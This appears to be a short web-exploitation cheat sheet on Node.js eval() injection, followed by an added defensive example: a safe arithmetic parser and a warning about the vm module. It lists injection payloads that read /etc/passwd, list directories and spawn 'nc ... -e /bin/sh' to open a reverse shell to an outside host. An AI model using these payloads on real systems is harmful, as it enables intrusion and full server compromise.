Web Exploitation 🕸️

Node.js eval() to RCE

Passing user input directly to eval() can cause remote code execution if the input is not properly validated or sanitized. An attacker can then abuse modules such as process, fs (file system) and child_process.

process.cwd()     // print current directory


require('fs').readdirSync('/app').toString()     // same as dir & ls for listing the directory


require('fs').readFileSync("/etc/passwd").toString()      // read content of the file


require("child_process").exec('nc {ip} {port} -e /bin/sh')     // RCE leading to a reverse shell
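
As an added example (not part of the original page), here is the vulnerable pattern beside a hardened replacement that parses arithmetic instead of evaluating it, so expressions like the ones above are rejected. The calculator scenario and the names unsafeCalc and safeCalc are assumptions made for illustration.

```javascript
// Added example, not from the original page; function names are hypothetical.
// Vulnerable pattern: user input reaches eval(), so any expression runs
// with the privileges of the Node.js process.
function unsafeCalc(input) {
  return eval(input);
}

// Hardened form: a small recursive-descent parser that accepts only
// numbers, + - * / and parentheses. Input is never executed as code.
function safeCalc(input) {
  if (typeof input !== 'string' || input.length > 100) {
    throw new Error('invalid input');
  }
  const tokens = input.match(/\d+(?:\.\d+)?|[-+*\/()]|\S/g) || [];
  let pos = 0;
  function factor() {
    const t = tokens[pos++];
    if (t === '(') {
      const v = expr();
      if (tokens[pos++] !== ')') throw new Error('expected )');
      return v;
    }
    if (t === '-') return -factor();
    if (t !== undefined && /^\d/.test(t)) return Number(t);
    throw new Error('unexpected token: ' + t);
  }
  function term() {
    let v = factor();
    while (tokens[pos] === '*' || tokens[pos] === '/') {
      const op = tokens[pos++];
      const r = factor();
      v = op === '*' ? v * r : v / r;
    }
    return v;
  }
  function expr() {
    let v = term();
    while (tokens[pos] === '+' || tokens[pos] === '-') {
      const op = tokens[pos++];
      const r = term();
      v = op === '+' ? v + r : v - r;
    }
    return v;
  }
  const result = expr();
  if (pos !== tokens.length) throw new Error('unexpected token: ' + tokens[pos]);
  return result;
}
```

Node's built-in vm module is not a security boundary, so moving the eval() call into vm does not replace parsing or strict allowlisting of input.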

To be continued...
